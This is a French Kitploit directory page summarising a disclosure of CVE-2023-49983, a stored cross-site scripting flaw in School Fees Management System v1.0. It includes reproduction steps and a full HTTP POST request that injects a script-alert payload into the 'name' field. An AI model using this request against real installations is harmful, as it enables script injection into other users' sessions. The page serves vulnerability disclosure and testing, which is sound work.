Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-49983 — Système de gestion des frais scolaires v1.0 - Vulnérabilité Cross-Site Scripting (XSS) dans le champ/paramètre "name" sur "/management/class" | Kitploit
Outils/GitHubGitHub/geraldoalcantara/cve-2023-49983
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubgeraldoalcantara/cve-2023-49983

CVE-2023-49983

Système de gestion des frais scolaires v1.0 - Vulnérabilité Cross-Site Scripting (XSS) dans le champ/paramètre "name" sur "/management/class"

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-49983

School Fees Management System v1.0 - Vulnérabilité de Cross-Site Scripting (XSS) dans le champ/paramètre "name" sur "/management/class"

Description : Une vulnérabilité de cross-site scripting (XSS) dans le composant "/management/class" de School Fees Management System v1.0 permet à des attaquants d'exécuter des scripts web ou du HTML arbitraires via une charge utile malveillante injectée dans le paramètre name.

Version du produit vulnérable : School Fees Management System v1.0
Auteur du CVE : Geraldo Alcântara
Date : 28/11/2023
Confirmé le : 19/12/2023
CVE : CVE-2023-49983
Testé sur : Windows

Étapes pour reproduire :

Pour exploiter la vulnérabilité, un utilisateur disposant des permissions appropriées doit accéder à la page "/ci_fms/admin/management/class". Sur cette page, l'utilisateur doit soit modifier une classe existante, soit en ajouter une nouvelle. La charge utile malveillante doit être insérée dans le paramètre "name" lors de ce processus.

Requête :

root@kitploit:~
POST /ci_fms/admin/action/edit_student/1/1 HTTP/1.1
Host: 192.168.68.148
Content-Length: 268
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydFBWs52W42v8XLGe
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/enrollment/class/1
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=c561k45qbrtsb34f2k30f936v0aijl01
Connection: close

------WebKitFormBoundarydFBWs52W42v8XLGe
Content-Disposition: form-data; name="name"

<script>alert(document.domain)</script>
------WebKitFormBoundarydFBWs52W42v8XLGe
Content-Disposition: form-data; name="parent"

1
------WebKitFormBoundarydFBWs52W42v8XLGe--

Découvreur(s)/Crédits :
Geraldo Alcântara

Télécharger l’outil